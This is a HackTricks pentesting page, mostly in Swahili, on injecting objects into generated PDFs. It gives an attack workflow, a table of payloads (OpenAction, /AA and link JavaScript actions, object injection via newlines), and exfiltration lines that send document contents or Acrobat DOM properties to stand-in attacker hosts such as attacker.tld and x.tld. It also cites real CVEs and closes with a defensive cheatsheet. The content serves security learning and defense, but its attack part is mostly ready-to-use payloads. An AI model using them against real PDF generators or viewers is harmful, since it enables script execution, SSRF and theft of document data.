PDF Injection

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Ikiwa input yako inaonekana ndani ya faili ya PDF, unaweza kujaribu kuingiza PDF data ili kuendesha JavaScript, kufanya SSRF au kuiba yaliyomo kwenye PDF. PDF syntax ni yenye uvumilivu mkubwa – ikiwa unaweza kutoka kwenye string au dictionary inayojumuisha input yako unaweza kuongeza objects mpya kabisa (au keys mpya katika object ileile) ambazo Acrobat/Chrome zitatafsiri kwa furaha. Tangu 2024 mfululizo wa ripoti za bug-bounty umeonyesha kwamba parenthesis moja isiyokimbizwa au back-slash moja inatosha kwa utekelezaji kamili wa script.

TL;DR – Mtiririko wa Mashambulizi ya Kisasa (2024-2026)

Tafuta thamani yoyote inayodhibitiwa na mtumiaji ambayo inamalizika ndani ya (parenthesis string), /URI ( … ) au /JS ( … ) field katika PDF iliyotengenezwa.
Ingiza ) (kufunga string) ikifuatiwa na mojawapo ya primitives zilizo hapa chini na maliza kwa parenthesis nyingine ya kufungua ili kuweka syntax halali.
Sambaza PDF mbaya kwa mwathirika (au kwa backend service inayorenda faili moja kwa moja – nzuri kwa blind bugs).
Payload yako inafanya kazi katika PDF viewer:

Chrome / Edge → PDFium Sandbox
Firefox → PDF.js (see CVE-2024-4367)
Acrobat → Full JavaScript API (can exfiltrate arbitrary file contents with this.getPageNthWord)

Example (annotation link hijack):

(https://victim.internal/) ) /A << /S /JavaScript /JS (app.alert("PDF pwned")) >> /Next (

Kipengele cha kwanza ) kinafunga string ya URI ya awali, kisha tunaongeza dictionary mpya ya Action ambayo Acrobat itaitekeleza wakati mtumiaji anabonyeza linki.

Primitives muhimu za Injection

Lengo	Payload Snippet	Maelezo
JavaScript on open	`/OpenAction << /S /JavaScript /JS (app.alert(1)) >>`	Inaendesha mara moja wakati hati inafunguliwa (inafanya kazi katika Acrobat, sio katika Chrome).
JavaScript on link	`/A << /S /JavaScript /JS (fetch('https://attacker.tld/?c='+this.getPageNumWords(0))) >>`	Inafanya kazi katika PDFium & Acrobat ikiwa unadhibiti `/Link` annotation.
Blind data exfiltration	`<< /Type /Action /S /URI /URI (https://attacker.tld/?leak=)`	Changanya na `this.getPageNthWord` ndani ya JS ili kuiba maudhui.
Server-Side SSRF	Same as above but target an internal URL – great when the PDF is rendered by back-office services that honour `/URI`.	Kama ilivyo hapo juu lakini inalenga URL ya ndani – nzuri wakati PDF inarenderiwa na huduma za back-office ambazo zinaheshimu `/URI`.
Additional Actions (/AA)	`/AA << /O << /S /JavaScript /JS (app.alert(1)) >> >>`	Ambatanisha kwenye dictionary ya Page/Annotation/Form ili iendeshe wakati wa kufunguliwa au kupata focus.
Line Break for new objects	`\nendobj\n10 0 obj\n<< /S /JavaScript /JS (app.alert(1)) >>\nendobj`	Ikiwa library inakuwezesha kuongeza newline characters unaweza kuunda objects mpya kabisa.

Embedded Actions kama Malengo ya Injection

PDF viewers huchukulia embedded actions kama /OpenAction na /AA (Additional Actions) kama vipengele vya daraja la kwanza ambavyo vinaweza kuendeshwa wakati hati inafunguliwa au tukio maalum linapotokea. Ikiwa unaweza kuingiza ndani ya dictionary yoyote inayokubali actions (Catalog, Page, Annotation, or Form field), unaweza kupandikiza mti wa /AA na kusababisha JavaScript ianze wakati wa kufunguliwa/kupewa focus.

Mfano wa payload kwa generator-side object injection (funga string/dictionary ya awali na weka /AA):

) >> /AA << /O << /S /JavaScript /JS (app.alert('AA fired')) >> >> (

Mfano huu unaendana na matatizo ya hivi karibuni ya jsPDF ambapo pembejeo inayodhibitiwa na mshambuliaji iliyopitishwa ndani ya addJS (au baadhi ya mashamba ya AcroForm) inavunja kutoka kwenye kamba ya JavaScript iliyokusudiwa na kuingiza kamusi ya Additional Action.

Gareth Heyes (PortSwigger) alitoa one-liner inayoorodhesha kila object ndani ya hati isiyojulikana — inafaa wakati huwezi kuona PDF yaliyotengenezwa:

) /JS (for(i in this){try{this.submitForm('https://x.tld?'+i+'='+this[i])}catch(e){}}) /S /JavaScript /A << >> (

The code iterates over the Acrobat DOM and makes outbound requests for every property/value pair, giving you a JSON-ish dump of the file. See the white-paper “Portable Data exFiltration” for the full technique.

Hitilafu za Dunia Halisi (2023-2026)

CVE-2026-25755 – jsPDF addJS PDF object injection: attacker-controlled strings zinaweza kufunga JS literal na kuingiza vitendo /AA → /O → /JavaScript vinavyotekelezwa wakati wa kufungua/ kupata focus.
CVE-2024-4367 – Arbitrary JavaScript execution in Firefox’s PDF.js prior to 4.2.67 ilivuka sandbox kwa kutumia crafted /JavaScript action.
Bug bounty 2024-05 – Major fintech iliruhusu customer-supplied invoice notes kuingia ndani ya /URI; ripoti ililipwa $10k baada ya kuonyesha SSRF kwa internal metadata host kwa kutumia file:/// URI.
CVE-2023-26155 – node-qpdf command-injection via unsanitised PDF path inaonyesha umuhimu wa kutoroka backslashes na parentheses hata kabla ya PDF layer.

Cheatsheet ya Ulinzi

Usiwe mchanganyiko wa raw user input ndani ya (…) strings au names. Escape \, (, ) kama inavyohitajika na §7.3 ya PDF spec au tumia hex strings <...>.
Ikiwa unaunda links, pendelea /URI (https://…) ambayo uta-URL-encode kabisa; zuia javascript: schemes katika client viewers.
Ondoa au thibitisha /OpenAction, /AA (additional actions), /Launch, /SubmitForm na /ImportData dictionaries wakati wa post-processing ya PDFs.
Upande wa server, render PDFs zisizoaminika kwa headless converter (mf. qpdf –decrypt –linearize) ambayo inaondoa JavaScript na external actions.
Sasisha PDF viewers; PDF.js < 4.2.67 na Acrobat Reader kabla ya patches za Julai 2024 zilikuwa zinaruhusu utekelezaji wa code rahisi.
Ikiwa unatumia client-side generators (mf., jsPDF), usipitie input zisizoaminika kwenye addJS au AcroForm setters ambazo zinaishia ndani ya PDF action dictionaries.

References

Gareth Heyes, “Portable Data exFiltration – XSS for PDFs”, PortSwigger Research (imesasishwa May 2024). https://portswigger.net/research/portable-data-exfiltration
Dawid Ryłko, “CVE-2024-4367: Arbitrary JavaScript Execution in PDF.js” (Apr 2024). https://dawid.dev/sec/cve-2024-4367-arbitrary-javascript-execution-in-pdf-js
GitLab Advisory Database, “CVE-2026-25755: jsPDF has a PDF Object Injection via Unsanitized Input in addJS Method” (Feb 2026). https://advisories.gitlab.com/pkg/npm/jspdf/CVE-2026-25755/
Adobe Acrobat Help, “Acrobat shows a warning message when signing documents” (Sep 2025) – embedded actions like OpenAction/AA. https://helpx.adobe.com/acrobat/kb/embedded-action-signing-warning.html

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.